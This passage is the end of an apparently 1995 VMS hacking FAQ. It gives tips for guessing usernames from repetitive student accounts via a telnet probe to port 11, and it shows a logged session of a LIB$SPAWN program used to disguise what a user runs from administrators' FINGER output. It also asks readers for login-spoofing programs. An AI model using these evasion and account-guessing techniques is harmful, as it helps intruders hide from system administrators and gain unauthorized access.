  1611.     Also,  I find one great trick is to look for "Student" type
  1612.     accounts.  That is,  accounts that appear to be repetitive. 
  1613.     You can then predict possible usernames. 
  1614.  
  1615.     The above can be accomplisted by using the below command
  1616.     (In most cases):
  1617.  
  1618. $ TELNET SITE.ADDRESS.COM /PORT=11
  1619.  
  1620.  
  1621. 2.    "On Unix machines,  I can make a symbolic link to a 'questionable'
  1622.     command,   so that is appears that I am doing one thing when 
  1623.     I am really doing another (Or copying and renaming the command). 
  1624.     Is there anyway I can make it appear that I am doing something 
  1625.     that I am not?". 
  1626.  
  1627.     When the command "FINGER" is issued,  a user/administrator
  1628.     can see what image is currently being executed by a particular
  1629.     user.   For example sake,  lets say you want to play with 
  1630.     NCP but you know that if the administrators see you in NCP, 
  1631.     they will get rather irate,  and kick you off the system. 
  1632.     You can make it appear that you are doing something else 
  1633.     by:
  1634.  
  1635.     a>  Copying the image,  renaming it,  and running it. [which
  1636.         may or may not work]. 
  1637.     b>  Write a routine that calls LIB$SPAWN named the command
  1638.         you wish to appear to be executing,   thus making it 
  1639.         appear via finger that you are executing another command. 
  1640.  
  1641.     Below is a quick example session to examine of senerio b. :
  1642.  
  1643. -----------------------<Begin Log Of Session>------------------------------
  1644. Trying...
  1645. Connected to UpperDck.
  1646. Escape character is '^]'.
  1647.  
  1648.                        UpperDck VMS Development System 
  1649.                             
  1650.  
  1651. Username: JOEUSER
  1652. Password: 
  1653.         Welcome to VAX/VMS version V5.2 on node UPPERDCK
  1654.     Last interactive login on Friday, 20-JAN-1995 12:58
  1655.  
  1656.  User= JOEUSER      Directory= [JOEUSER]       UIC=  [JOEUSER]
  1657.         Terminal= NTY12:      20-JAN-1995 13:00:16.93
  1658.  
  1659. $ create mail.bas
  1660. 10 external long function lib$spawn  ! Create a program that calls LIB$SPAWN
  1661.    declare long xspawn             ! This can be coded in anything you 
  1662.    xspawn=lib$spawn()             ! want
  1663. <CRTL-Z>
  1664. $ basic mail                 ! Compile out LIB$SPAWN program
  1665. $ link mail                 ! Link it. 
  1666. $ finger                 ! Show what we look like before we run it
  1667. 20 JAN 13:02:06    Up 28 21:15:12
  1668. 2+0 Jobs   Load ave  0.07 0.03 0.01
  1669.  
  1670. Login   Name                 Job   Subsys  TTY     Idle  Net Site
  1671. JOEUSER JOEUSER              0013d FINGER  nty12         UPPERDCK
  1672. OPER    Operations           0013a GLYPH   nty9     40   OPSITE
  1673.  
  1674. $ run mail    ! Makes us appear as if we are in the "MAIL" utility. 
  1675. $ finger    ! Take a look'see
  1676. 20 JAN 13:02:15    Up 28 21:15:21
  1677. 2+0 Jobs   Load ave  0.07 0.03 0.01
  1678.  
  1679. Login   Name                 Job   Subsys  TTY     Idle  Net Site
  1680. JOEUSER JOEUSER              0013d MAIL    nty12         UPPERDCK
  1681. OPER    Operations           0013a GLYPH   nty9     40   OPSITE
  1682.  
  1683. $ log  ! Stop the subprocess
  1684.   Process JOEUSER_1 logged out at 20-JAN-1995 13:02:20.02
  1685. $ log  ! logout
  1686.   JOEUSER        logged out at 20-JAN-1995 13:02:22.32
  1687.  
  1688. -----------------------------<End Of Log>--------------------------------
  1689.  
  1690.  
  1691.  
  1692. Finnal Notes: 
  1693.  
  1694.     This FAQ is far from complete,  and will remain in its "beta"
  1695.     stages for sometime.  
  1696.  
  1697.     I am sure that many people while question the fact of the us
  1698.     of VMS BASIC as opposed to C.    The reason that some examples
  1699.     where given with VMS BASIC is because of a lack of a C compiler
  1700.     on our local machine.   Besides,  it gets the job done
  1701.     (sloppy). 
  1702.  
  1703.     I was mailed many terminal spoofing programs,  but since the
  1704.     range on these can be so large,  and its one of the most
  1705.     common VMS hack's,  I will wait until the next release of this
  1706.     FAQ until a good terminal spoofing is released with this 
  1707.     (Anyone ever thought of grabbing the SYS$ANNOUNCE to emulate
  1708.     the login screen??). 
  1709.  
  1710.     I got alot of mail from alot of people. 
  1711.  
  1712.     Thanks to Shadow Hacker,   Risc,   Trouser,  Spoon,  and 
  1713.     all the boys at The Upper-Deck. 
  1714.  
  1715.     Bitwarrier for intresting conversation (besides terminal
  1716.     spoofing),  the ton of people that mailed me.  Thanks.
  1717.  
  1718.     - Things that need to be added/updates:
  1719.  
  1720.       Identifying VMS machines.....
  1721.       Information on the OPCOM process....
  1722.       Information on accounting/user tracking... 
  1723.       A decent terminal spoof program
  1724.  
  1725.     - This that we are looking for [Please mail beaver@upperdck.blkbox.
  1726.       com,  if you know about these hack's]
  1727.  
  1728.       VMS Phone mail recording facility (Uses undocumented routines
  1729.       found in the PHONE.EXE command)
  1730.  
  1731.       Passing commands via VMS mail. 
  1732.  
  1733.     If you have anything remotely intresting for the next release, 
  1734.     please mail them to me at:
  1735.  
  1736.     beaver@upperdck.blkbox.com
  1737.  
  1738.     "It ain't done,  but hey... It a fucking start......"
  1739.  
  1740.  
  1741.  
  1742.  
  1743.